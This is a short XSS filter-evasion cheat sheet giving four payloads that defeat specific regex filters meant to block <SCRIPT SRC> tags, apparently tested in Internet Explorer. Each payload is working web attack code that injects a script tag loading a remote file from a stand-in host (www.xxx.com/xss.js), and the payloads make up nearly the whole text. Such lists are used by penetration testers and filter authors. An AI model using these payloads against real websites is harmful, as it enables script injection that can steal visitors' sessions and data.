1. This was tested in IE; your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":

Code: <SCRIPT a=">" SRC="http://www.xxx.com/xss.js"></SCRIPT>

2. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

Code: <SCRIPT =">" SRC="http://www.xxx.com/xss.js"></SCRIPT>

3. Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

Code: <SCRIPT a=">" '' SRC="http://www.xxx.com/xss.js"></SCRIPT>

4. And one last XSS attack to evade "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i", using grave accents:

Code: <SCRIPT a=`>` SRC="www.xxx.com/xss.js"></SCRIPT>